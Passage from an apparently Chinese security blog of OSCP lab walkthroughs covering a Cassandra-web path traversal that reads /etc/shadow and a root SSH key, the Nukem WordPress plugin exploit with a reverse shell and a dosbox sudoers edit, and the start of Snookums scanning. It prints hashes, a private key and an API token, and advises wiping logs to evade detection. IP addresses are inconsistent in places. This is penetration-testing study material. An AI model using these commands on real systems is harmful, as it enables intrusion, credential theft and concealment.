现在就可以用之前ssh登录失败的cassise账户直接su切换，因为ssh配置文件里写了只允许root和anthony账户登录，但是这两个我们又不知道密码。这个下面的id_rsa利用失败，不知道是谁的ssh密钥文件，尝试了两个账户都失败。然后发现cassise用户可以用sudo的权限有/usr/local/bin/cassandra-web

内网信息收集

 1# 简单来说，这个命令就是用指定的配置启动了 Cassandra Web 管理工具，让用户可以通过 Web 界面管理 Cassandra 数据库
 2# `cassandra - web`工具将以指定的用户名和密码启动，并监听在`0.0.0.0:4444`上，允许远程连接访问其 Web 界面来管理 Cassandra 数据库
 3sudo /usr/local/bin/cassandra-web -B 0.0.0.0:4444 -u cassie -p SecondBiteTheApple330
 4
 5
 6# 另一个shell运行下面命令
 7# 读取敏感信息
 8curl --path-as-is localhost:4444/../../../../../../../../etc/shadow
 9curl --path-as-is localhost:4444/../../../../../../../../home/anthony/.bash_history
10curl --path-as-is localhost:4444/../../../../../../../../home/anthony/.ssh/id_rsa

这样就能得到的密钥文件了，而且这个密钥文件还放到了root文件夹下，也就是说能直接用这个密钥登录root。

 1# 得到密码文件，但是这个长度一般是爆破不开的
 2cassie:$6$/WeFDwP1CNIN34/z$9woKSLSZhgHw1mX3ou90wnR.i5LHEfeyfHbxu7nYmaZILVrbhHrSeHNGqV0WesuQWGIL7DHEwHKOLK6UX79DI0:19209:0:99999:7
 3freeswitch:!:19209
 4
 5anthony:$6$01NV0gAhVLOnUHb0$byLv3N95fqVvhut9rbsrYOVzi8QseWfkFl7.VDQ.26a.0IkEVR2TDXoTv/KCMLjUOQZMMpkTUdC3WIyqSWQ.Y1:19209:0:99999:7
 6# 得到密钥文件
 7-----BEGIN OPENSSH PRIVATE KEY-----
 8b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
 9NhAAAAAwEAAQAAAQEAw59iC+ySJ9F/xWp8QVkvBva2nCFikZ0VT7hkhtAxujRRqKjhLKJe
10d19FBjwkeSg+PevKIzrBVr0JQuEPJ1C9NCxRsp91xECMK3hGh/DBdfh1FrQACtS4oOdzdM
11jWyB00P1JPdEM4ojwzPu0CcduuV0kVJDndtsDqAcLJr+Ls8zYo376zCyJuCCBonPVitr2m
12B6KWILv/ajKwbgrNMZpQb8prHL3lRIVabjaSv0bITx1KMeyaya+K+Dz84Vu8uHNFJO0rhq
13gBAGtUgBJNJWa9EZtwws9PtsLIOzyZYrQTOTq4+q/FFpAKfbsNdqUe445FkvPmryyx7If/
14DaMoSYSPhwAAA8gc9JxpHPScaQAAAAdzc2gtcnNhAAABAQDDn2IL7JIn0X/FanxBWS8G9r
15acIWKRnRVPuGSG0DG6NFGoqOEsol53X0UGPCR5KD4968ojOsFWvQlC4Q8nUL00LFGyn3XE
16QIwreEaH8MF1+HUWtAAK1Lig53N0yNbIHTQ/Uk90QziiPDM+7QJx265XSRUkOd22wOoBws
17mv4uzzNijfvrMLIm4IIGic9WK2vaYHopYgu/9qMrBuCs0xmlBvymscveVEhVpuNpK/RshP
18HUox7JrJr4r4PPzhW7y4c0Uk7SuGqAEAa1SAEk0lZr0Rm3DCz0+2wsg7PJlitBM5Orj6r8
19UWkAp9uw12pR7jjkWS8+avLLHsh/8NoyhJhI+HAAAAAwEAAQAAAQBjswJsY1il9I7zFW9Y
20etSN7wVok1dCMVXgOHD7iHYfmXSYyeFhNyuAGUz7fYF1Qj5enqJ5zAMnataigEOR3QNg6M
21mGiOCjceY+bWE8/UYMEuHR/VEcNAgY8X0VYxqcCM5NC201KuFdReM0SeT6FGVJVRTyTo+i
22CbX5ycWy36u109ncxnDrxJvvb7xROxQ/dCrusF2uVuejUtI4uX1eeqZy3Rb3GPVI4Ttq0+
230hu6jNH4YCYU3SGdwTDz/UJIh9/10OJYsuKcDPBlYwT7mw2QmES3IACPpW8KZAigSLM4fG
24Y2Ej3uwX8g6pku6P6ecgwmE2jYPP4c/TMU7TLuSAT9TpAAAAgG46HP7WIX+Hjdjuxa2/2C
25gX/VSpkzFcdARj51oG4bgXW33pkoXWHvt/iIz8ahHqZB4dniCjHVzjm2hiXwbUvvnKMrCG
26krIAfZcUP7Ng/pb1wmqz14lNwuhj9WUhoVJFgYk14knZhC2v2dPdZ8BZ3dqBnfQl0IfR9b
27yyQzy+CLBRAAAAgQD7g2V+1vlb8MEyIhQJsSxPGA8Ge05HJDKmaiwC2o+L3Er1dlktm/Ys
28kBW5hWiVwWoeCUAmUcNgFHMFs5nIZnWBwUhgukrdGu3xXpipp9uyeYuuE0/jGob5SFHXvU
29DEaXqE8Q9K14vb9by1RZaxWEMK6byndDNswtz9AeEwnCG0OwAAAIEAxxy/IMPfT3PUoknN
30Q2N8D2WlFEYh0avw/VlqUiGTJE8K6lbzu6M0nxv+OI0i1BVR1zrd28BYphDOsAy6kZNBTU
31iw4liAQFFhimnpld+7/8EBW1Oti8ZH5Mx8RdsxYtzBlC2uDyblKrG030Nk0EHNpcG6kRVj
324oGMJpv1aeQnWSUAAAAMYW50aG9ueUBjbHVlAQIDBAUGBw==
33-----END OPENSSH PRIVATE KEY-----

提权root

然后在kali中复制这个密钥，然后直接用密钥登录即可。

1cat > id_rsa
2chmod 600 id_rsa
3ssh -i id_rsa root@192.168.133.240

这里不知道为什么只能root登录而不是Anthony登录，按道理来说应该都能登录的。找到提权后的flag 这里提示smb服务开启，但是没什么用实在是找不到第一个local那个flag在哪里，看了一下官方提示直接find找吧，OSCP的flag命名很规范，直接找名字就行。

1find / -type f -name "local.txt" -print 2>/dev/null
2cat /var/lib/freeswitch/local.txt

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 192.168.45.187]
 B[靶机 
 192.168.133.240]
 C[cassie账户密码]
 D[freeswitch的webshell]
 E[切cassie账户]
 F[root密钥]

 %% 路径关系
 A-->|扫描|B
 B-->|Cassandra远程文件读取漏洞|C
 B-->|freeswitch命令执行漏洞|D
 D-->E
 C-->E
 E-->|Cassandra本地文件读取|F
 

	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 %% 线型与颜色方案（亮色/暗色通用）
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

 %% 应用样式
 class A attack;
 class B,C,D public;
 class E,F internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2025-08-22 15:40, 2025-08-22 16:40
 漏洞识别 :a2, after a1, 20m
 
 section 攻击阶段
 初始访问 :b1, after a2, 20m
 权限提升 :crit,b2, after b1, 40m
 
 section 后渗透阶段
 数据窃取 :c1, after b2, 5m

有哪些容易泄露配置信息的文件？

在利用文件读取漏洞进行渗透测试时，优先读取以下高价值文件可快速获取关键信息，推动后续攻击链的构建。根据漏洞利用目标和系统环境，推荐按优先级读取以下文件：

🔍 一、系统关键文件（Linux/Unix）

/etc/passwd
- 价值：泄露所有用户账户信息（UID/GID、Shell类型），为暴力破解或权限提升提供目标列表。
- 后续利用：结合弱口令攻击或 suid程序提权。
/etc/shadow
- 价值：存储用户密码哈希（需root权限读取），破解后可获取系统权限。
- 注意：若漏洞权限不足，需结合其他漏洞（如路径遍历）尝试读取。
/etc/group
- 价值：获取用户组信息，识别高权限组（如 sudo、docker），辅助横向移动。

💻 二、应用敏感文件

Web服务器配置
- Nginx/Apache：
  - etc/nginx/nginx.conf、etc/httpd/conf/httpd.conf：获取虚拟主机配置、反向代理规则，发现隐藏服务或内部网络信息。
- 数据库凭据：
  - 如 WEB-INF/web.xml（Java Web应用）、config.php（PHP应用）：泄露数据库连接字符串，直接访问数据库。
环境配置文件
- .env文件：存储API密钥、加密密钥等敏感信息，常见于Node.js/Python应用。
- Kubernetes配置：
  - /var/run/secrets/kubernetes.io/serviceaccount/token：获取Service Account Token，接管K8s集群。

📂 三、动态信息与日志文件

/proc/self/environ
- 价值：暴露进程环境变量（如 PATH、SECRET_KEY），可能包含硬编码凭据或调试信息。
/proc/self/cmdline
- 价值：揭示当前进程启动命令及参数，辅助识别应用框架或配置路径。
系统日志
- /var/log/auth.log（Linux）：查看SSH登录记录，定位管理员IP或爆破痕迹。
- C:\Windows\System32\winevt\Logs\Security.evtx（Windows）：分析安全事件日志。

⚙️ 四、特殊路径与内存文件

临时文件与缓存
- /tmp/、/dev/shm/：查找上传的恶意脚本或缓存数据（如Session文件）。
内核与内存映射
- /proc/kallsyms（需root）：泄露内核函数地址，绕过ASLR防护。
- /dev/mem：直接访问物理内存，提取加密密钥（需高权限）。

🎯 五、针对Java应用的专项读取

WEB-INF/classes/目录
- 价值：读取编译后的 .class文件，反编译获取业务逻辑漏洞（如硬编码密钥）。
WEB-INF/web.xml
- 价值：解析Servlet映射、过滤器配置，发现未授权访问点或安全绕过路径。
JAR/WAR 文件
- 如 lib/application.jar：解压后分析依赖库漏洞（如Log4j）。

🛡️ 防御规避与注意事项

合法性：仅在授权范围内测试，避免读取用户隐私数据。
隐蔽性：
- 清理日志（如覆盖 /var/log/apache2/access.log）。
- 避免频繁请求，触发WAF/IDS告警。
工具辅助：
- 使用 jd-gui反编译 .class文件。
- 通过 pwntools自动化解析内存偏移。

💎 总结：优先级策略

快速突破：/etc/passwd→ /proc/self/environ→ 应用配置文件。
深度渗透：数据库凭据 → 日志文件 → 内核/内存文件。
源码反制：Java .class文件 → 依赖库扫描 → 反编译分析。

find命令的妙用

要高效查找 local.txt文件，需优化 find /命令以避免全盘扫描并提升定位精度。以下是针对性优化方案及命令：

🔍 优化后的查找命令

find / -type f -name "local.txt" -print 2>/dev/null

关键优化点：

限定文件类型：-type f仅搜索普通文件，跳过目录、符号链接等无关项。
精准文件名匹配：-name "local.txt"严格匹配目标文件名，避免模糊搜索的开销。
抑制错误输出：2>/dev/null隐藏权限不足等报错，减少终端干扰。

⚙️ 进阶场景优化

1. 限制搜索深度（减少扫描范围）

find / -maxdepth 3 -type f -name "local.txt" 2>/dev/null

适用场景：已知文件位于顶层目录（如 /etc/、/tmp/）时，通过 -maxdepth 3限制子目录层级，速度提升显著。

2. 组合条件搜索（时间/大小过滤）

# 查找最近7天内修改过的 local.txt
find / -type f -name "local.txt" -mtime -7 2>/dev/null

# 查找大于1KB的 local.txt
find / -type f -name "local.txt" -size +1k 2>/dev/null

适用场景：
- -mtime -7：文件近期被修改过（如渗透测试中的后门文件）。
- -size +1k：排除空文件或小体积缓存文件。

3. 权限/所有者过滤

# 查找属主为 root 的 local.txt
find / -type f -name "local.txt" -user root 2>/dev/null

# 查找权限为644的 local.txt
find / -type f -name "local.txt" -perm 644 2>/dev/null

适用场景：快速定位系统关键文件或配置。

💡 替代方案（更高效率）

使用 `locate`命令（需先更新数据库）：

sudo updatedb # 更新文件数据库（需root权限）
locate local.txt # 秒级检索（依赖定期更新的数据库）

优势：比 find快数十倍，适合频繁搜索固定文件。
注意：新建文件需等待数据库更新（默认每日自动更新）。

⚠️ 注意事项

权限问题：搜索系统目录（如 /etc/、/root/）需 sudo权限，否则结果不全。
性能影响：全盘扫描（find /）可能加重磁盘负载，建议在非高峰时段执行。
精确路径：若已知大致路径（如 /var/log/），直接指定路径而非根目录 /，效率更高。

📊 命令执行效果对比

方法	速度	精度	适用场景
`find / -name "local.txt"`	慢	高	全盘精准搜索
`find / -maxdepth 3 ...`	中	中	限定深度快速扫描
`locate local.txt`	极快	依赖更新	高频检索已知文件

为什么root可以登录成功而Anthony用户无法用密钥登录？

根据 .bash_history记录和测试现象，结合 SSH 密钥认证机制，anthony用户连接失败而 root用户成功的原因可能如下：

⚠️ 核心原因分析

密钥文件权限问题（anthony 用户）
- SSH 要求私钥权限必须为 600，若权限过宽（如 644）会导致客户端拒绝使用私钥。
- 检查 anthony 的私钥权限：
```
ls -l ~/.ssh/id_rsa # 应为 -rw------- (600)
```
  若权限不符，需修复：
```
chmod 600 ~/.ssh/id_rsa
```
.ssh目录或 authorized_keys权限问题（服务器端）
- anthony用户的 .ssh目录权限需为 700，authorized_keys文件权限需为 600。
- 若权限错误（如 authorized_keys为 644），服务器会拒绝认证：
```
# 在服务器上检查 anthony 用户的配置
chmod 700 /home/anthony/.ssh
chmod 600 /home/anthony/.ssh/authorized_keys
```
authorized_keys内容或路径错误
- cp .ssh/id_rsa.pub .ssh/authorized_keys可能未正确覆盖文件（如文件路径错误或内容截断）。
- 验证 authorized_keys内容是否包含完整公钥：
```
cat /home/anthony/.ssh/authorized_keys
```
SSH 服务配置限制
- 服务器可能禁止 anthony用户使用密钥登录（如 sshd_config中设置了 DenyUsers anthony或 PubkeyAuthentication no）。
- 检查服务器配置：
```
grep -E "DenyUsers|PubkeyAuthentication" /etc/ssh/sshd_config
# 确保包含： PubkeyAuthentication yes
```
用户目录所有权或权限问题
- anthony用户目录权限过宽（如 /home/anthony权限为 777）会导致 SSH 拒绝认证。
- 修复目录权限：
```
chmod 755 /home/anthony # 必须 ≤755
```

✅ 为何 `root`用户能成功？

root的 authorized_keys配置正确
- sudo cp .ssh/id_rsa.pub /root/.ssh/authorized_keys命令直接将公钥复制到 root用户，且 root的 .ssh目录通常自动满足权限要求（700）。
root用户不受某些限制
- sshd_config可能未限制 root登录（如 PermitRootLogin yes），而 anthony用户可能被其他规则阻止。

🔧 解决方案

修复 anthony 用户的权限

客户端（本地）：
```
chmod 600 ~/.ssh/id_rsa
```

服务器端（以 anthony登录或通过 root修复）：

chmod 700 /home/anthony/.ssh
chmod 600 /home/anthony/.ssh/authorized_keys
chmod 755 /home/anthony # 确保目录权限安全

验证 authorized_keys内容

确认公钥完整写入：

echo "$(cat ~/.ssh/id_rsa.pub)" > /home/anthony/.ssh/authorized_keys

检查服务器 SSH 配置

编辑 /etc/ssh/sshd_config：

PubkeyAuthentication yes # 启用密钥认证
AllowUsers anthony root # 允许 anthony 和 root 登录

重启服务生效：

sudo systemctl restart sshd

调试连接

使用 -vvv参数查看详细错误：

ssh -vvv -i id_rsa anthony@192.168.133.240

检查服务器日志：

tail -f /var/log/auth.log # Debian/Ubuntu
tail -f /var/log/secure # RHEL/CentOS

根据您提供的目录信息和 SSH 密钥认证机制，/home/anthony/.ssh/authorized_keys文件缺失会导致 SSH 公钥登录失败。以下是具体分析和解决方案：

⚠️ 无法登录的原因

authorized_keys文件缺失
- 该文件是 SSH 服务器验证客户端公钥的核心依据。服务器会检查客户端提供的公钥是否在 authorized_keys中，若文件不存在，则公钥认证自动失败。
- 您的目录中仅有 id_rsa.pub（公钥）和 id_rsa（私钥），但未将公钥内容添加到 authorized_keys文件中，导致服务器无法匹配私钥。
root用户登录成功的原因
- 您此前执行了 sudo cp .ssh/id_rsa.pub /root/.ssh/authorized_keys，已将公钥正确复制到 root用户的 authorized_keys文件，因此 root可正常登录。

🔧 解决方案：为 `anthony`用户创建 `authorized_keys`

步骤 1：创建文件并添加公钥内容

# 进入 anthony 的 .ssh 目录
cd /home/anthony/.ssh

# 创建 authorized_keys 文件并将 id_rsa.pub 内容追加到其中
cat id_rsa.pub >> authorized_keys

步骤 2：设置严格的文件权限

# 设置 authorized_keys 权限为 600（仅所有者可读写）
chmod 600 authorized_keys

# 确保 .ssh 目录权限为 700（仅所有者可访问）
chmod 700 /home/anthony/.ssh

权限要求：SSH 要求 authorized_keys权限为 600，.ssh目录权限为 700，否则服务器会拒绝认证。

步骤 3：验证 SSH 配置（可选）

检查 /etc/ssh/sshd_config确保以下配置启用：

PubkeyAuthentication yes # 启用公钥认证
AuthorizedKeysFile .ssh/authorized_keys # 指定公钥文件路径

重启 SSH 服务使配置生效：
```
sudo systemctl restart sshd
```

✅ 验证登录

完成上述步骤后，尝试重新连接：

ssh -i /path/to/id_rsa anthony@192.168.133.240

若仍失败，可通过调试模式定位问题：

ssh -vvv -i /path/to/id_rsa anthony@192.168.133.240

📌 关键注意事项

文件完整性
- authorized_keys中公钥需与客户端私钥严格匹配，复制时避免遗漏字符。
权限安全
- 权限错误是常见失败原因，需确保：
  - authorized_keys→ 600
  - .ssh目录 → 700
  - 私钥 id_rsa→ 600（您已满足）
目录所有权
- 确保 /home/anthony及其子目录所有者是 anthony，否则 SSH 可能拒绝认证：
```
chown -R anthony:anthony /home/anthony
```

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场 Nukem WP

Wed, 20 Aug 2025 14:22:15 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开靶场

信息收集

1# Kali攻击机地址
2192.168.45.159
3# 靶机地址
4192.168.206.105

扫描端口和目录

 1# 设置MTU
 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# 扫描端口
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.236.105 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# 扫描服务
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.105
 9sudo nmap --script=vuln -p$ports -Pn 192.168.236.105
10# 扫描目录
11gobuster dir -e -u http://192.168.206.105 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
12whatweb http://192.168.236.105/

扫描结果如下：

 1┌──(kali㉿kali)-[~/Desktop/Nukem]
 2└─$ echo $ports
 322,80,3306
 4
 5┌──(kali㉿kali)-[~/Desktop/Nukem]
 6└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.105
 7Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 02:28 EDT
 8Nmap scan report for 192.168.236.105
 9Host is up (0.32s latency).
 10
 11PORT STATE SERVICE VERSION
 1222/tcp open ssh OpenSSH 8.3 (protocol 2.0)
 13| ssh-hostkey:
 14| 3072 3e:6a:f5:d3:30:08:7a:ec:38:28:a0:88:4d:75:da:19 (RSA)
 15| 256 43:3b:b5:bf:93:86:68:e9:d5:75:9c:7d:26:94:55:81 (ECDSA)
 16|_ 256 e3:f7:1c:ae:cd:91:c1:28:a3:3a:5b:f6:3e:da:3f:58 (ED25519)
 1780/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.10)
 18|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.10
 193306/tcp open mysql MariaDB 10.3.24 or later (unauthorized)
 20Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 21Device type: general purpose|router
 22Running (JUST GUESSING): Linux 4.X|5.X|3.X|2.6.X (97%), MikroTik RouterOS 7.X (89%)
 23OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
 24Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (91%), Linux 3.2 - 4.14 (91%), Linux 2.6.32 - 3.10 (91%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (89%)
 25No exact OS matches for host (test conditions non-ideal).
 26
 27OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 28Nmap done: 1 IP address (1 host up) scanned in 254.79 seconds
 29
 30┌──(kali㉿kali)-[~/Desktop/Nukem]
 31└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.236.105
 32Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 02:36 EDT
 33Nmap scan report for 192.168.236.105
 34Host is up (0.41s latency).
 35
 36PORT STATE SERVICE
 3722/tcp open ssh
 3880/tcp open http
 39|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.'
 40| http-csrf:
 41| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.236.105
 42| Found the following possible CSRF vulnerabilities:
 43|
 44| Path: http://192.168.236.105:80/
 45| Form id:
 46| Form action: /
 47|
 48| Path: http://192.168.236.105:80/
 49| Form id:
 50| Form action: /
 51|
 52| Path: http://192.168.236.105:80/index.php/author/admin/
 53| Form id:
 54| Form action: /
 55|
 56| Path: http://192.168.236.105:80/index.php/author/admin/
 57| Form id:
 58| Form action: /
 59|
 60| Path: http://192.168.236.105:80/index.php/student-registration/
 61| Form id:
 62| Form action: /
 63|
 64| Path: http://192.168.236.105:80/index.php/student-registration/
 65| Form id:
 66| Form action: /
 67|
 68| Path: http://192.168.236.105:80/index.php/sample-page/
 69| Form id:
 70| Form action: /
 71|
 72| Path: http://192.168.236.105:80/index.php/sample-page/
 73| Form id:
 74| Form action: /
 75|
 76| Path: http://192.168.236.105:80/index.php/2020/09/
 77| Form id:
 78| Form action: /
 79|
 80| Path: http://192.168.236.105:80/index.php/2020/09/
 81| Form id:
 82| Form action: /
 83|
 84| Path: http://192.168.236.105:80/index.php/instructor-registration/
 85| Form id:
 86| Form action: /
 87|
 88| Path: http://192.168.236.105:80/index.php/instructor-registration/
 89| Form id:
 90| Form action: /
 91|
 92| Path: http://192.168.236.105:80/index.php/category/uncategorized/
 93| Form id:
 94| Form action: /
 95|
 96| Path: http://192.168.236.105:80/index.php/category/uncategorized/
 97| Form id:
 98| Form action: /
 99|
100| Path: http://192.168.236.105:80/wp-login.php
101| Form id: loginform
102| Form action: /wp-login.php
103|
104| Path: http://192.168.236.105:80/index.php/dashboard/
105| Form id:
106| Form action: /
107|
108| Path: http://192.168.236.105:80/?p=6
109| Form id:
110|_ Form action: /
111| http-fileupload-exploiter:
112|
113| Couldn't find a file-type field.
114|
115| Couldn't find a file-type field.
116|
117|_ Couldn't find a file-type field.'
118| http-sql-injection:
119| Possible sqli for queries:
120|_ http://192.168.236.105:80/wp-includes/js/plupload/moxie.min.js?ver=1.3.5%27%20OR%20sqlspider
121|_http-dombased-xss: Couldn't find any DOM based XSS.'
122|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
1233306/tcp open mysql
124
125Nmap done: 1 IP address (1 host up) scanned in 556.05 seconds
126
127┌──(kali㉿kali)-[~/Desktop/Nukem]
128└─$ whatweb http://192.168.236.105/
129http://192.168.236.105/ [200 OK] Apache[2.4.46], Country[RESERVED][ZZ], Email[admin@local.host], HTML5, HTTPServer[Unix][Apache/2.4.46 (Unix) PHP/7.4.10], IP[192.168.236.105], JQuery, MetaGenerator[TutorLMS 1.5.3,WordPress 5.5.1], PHP[7.4.10], Script[text/javascript], Title[Retro Gamming &#8211; Just another WordPress site], UncommonHeaders[link], WordPress[5.5.1], X-Powered-By[PHP/7.4.10]
130
131===============================================================
132http://192.168.206.105/index.php (Status: 301) [Size: 0] [--> http://192.168.206.105/]
133http://192.168.206.105/wp-content (Status: 301) [Size: 242] [--> http://192.168.206.105/wp-content/]
134http://192.168.206.105/wp-login.php (Status: 200) [Size: 6193]
135http://192.168.206.105/wordpress (Status: 301) [Size: 241] [--> http://192.168.206.105/wordpress/]
136http://192.168.206.105/license.txt (Status: 200) [Size: 19915]
137http://192.168.206.105/wp-includes (Status: 301) [Size: 243] [--> http://192.168.206.105/wp-includes/]
138http://192.168.206.105/readme.html (Status: 200) [Size: 7278]
139http://192.168.206.105/wp-trackback.php (Status: 200) [Size: 135]
140http://192.168.206.105/wp-admin (Status: 301) [Size: 240] [--> http://192.168.206.105/wp-admin/]
141http://192.168.206.105/xmlrpc.php (Status: 405) [Size: 42]
142^C

熟悉的Wordpress，找到登录入口

1# 简单版本
2wpscan --update --url http://192.168.206.105 -e u
3 
4# 复杂全插件扫描版本
5# 枚举插件和用户名
6wpscan --enumerate ap,t,u --api-token 6Chbzkayn13XcMOgzoDGA85OLpV5BbXhGQ55s8qz88g --plugins-detection aggressive --url http://192.168.206.105 
7# 爆破密码 很慢，作为最后的手段
8wpscan --usernames admin --passwords /usr/share/wordlists/rockyou.txt --url http://192.168.206.105

WP插件漏洞

虽然没有得到登录密码，但是扫描发现simple file list插件存在漏洞，搜索simple file list插件相关漏洞利用方法。

1searchsploit simple file list
2searchsploit -m php/webapps/48979.py

修改为kali的IP，端口改为原靶机就开放的端口，这里用的5000，虽然在一开始并未扫描出来，但是降速后是可以扫描出来的5000端口。

1rlwrap nc -lvnp 5000
2python 48979.py http://192.168.206.105

内网信息收集

查看配置文件得到数据库密码

1cat wp-config.php

数据库密码

commander CommanderKeenVorticons1990

把数据密码当作用户密码来直接复用，切换用户，也可以直接ssh登录代替当前的登录。

1su commander
2python3 -c 'import pty;pty.spawn("/bin/bash")'

拿到第一个flag 数据库中找不到更多的有用内容

1scp linpeas.sh commander@192.168.206.105:/tmp/linpeas.sh

上传小豌豆来找发现/usr/bin/dosbox 可以提权，上网站查找提权命令 https://gtfobins.github.io/gtfobins/dosbox/ 发现可以越权写入文件，把commander写成全sudo的即可。

1LFILE='/etc/sudoers' 
2/usr/bin/dosbox -c 'mount c /' -c "echo commander ALL=(ALL) NOPASSWD: ALL >> c:$LFILE" -c exit
3sudo -s

拿到第二个flag。

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 192.168.45.159]
 B[靶机 
 192.168.206.105]
 C[http用户Shell]
 D[commonder用户账户密码]
 E[root]

 %% 路径关系
 A-->|扫描|B
 B-->|插件漏洞|C
 C-->|数据库密码泄露|D
 D-->|busybox提权漏洞|E

	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 %% 线型与颜色方案（亮色/暗色通用）
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

 %% 应用样式
 class A attack;
 class B,C public;
 class D,E internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2025-08-20 14:25, 2025-08-20 15:25
 漏洞识别 :a2, after a1, 2025-08-20 16:40
 
 section 攻击阶段
 初始访问 :b1, after a2, 2025-08-20 17:12
 权限提升 :crit,b2, 2025-08-22 15:05, 15m
 
 section 后渗透阶段
 数据窃取 :c1, after b2, 5m

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场 Snookums WP

Wed, 20 Aug 2025 10:57:24 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开靶场

信息收集

1# Kali攻击机地址
2192.168.45.238
3# 靶机地址
4192.168.236.58

扫描端口和目录

 1# 设置MTU
 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# 扫描端口
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.236.58 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# 扫描服务
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.58
 9sudo nmap --script=vuln -p$ports -Pn 192.168.236.58
10# 扫描目录
11gobuster dir -e -u http://192.168.236.58 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
12whatweb http://192.168.236.58/

扫描结果如下：

 1
 2┌──(kali㉿kali)-[~/Desktop]
 3└─$ echo $ports
 421,22,80,111,139,445,3306
 5
 6┌──(kali㉿kali)-[~/Desktop]
 7└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.58
 8Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 23:01 EDT
 9Nmap scan report for 192.168.236.58
 10Host is up (0.30s latency).
 11
 12PORT STATE SERVICE VERSION
 1321/tcp open ftp vsftpd 3.0.2
 1422/tcp open ssh OpenSSH 7.4 (protocol 2.0)
 15| ssh-hostkey:
 16| 2048 4a:79:67:12:c7:ec:13:3a:96:bd:d3:b4:7c:f3:95:15 (RSA)
 17| 256 a8:a3:a7:88:cf:37:27:b5:4d:45:13:79:db:d2:ba:cb (ECDSA)
 18|_ 256 f2:07:13:19:1f:29:de:19:48:7c:db:45:99:f9:cd:3e (ED25519)
 1980/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
 20|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
 21|_http-title: Simple PHP Photo Gallery
 22111/tcp open rpcbind
 23139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
 24445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
 253306/tcp open mysql MySQL (unauthorized)
 26Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 27Device type: general purpose|router
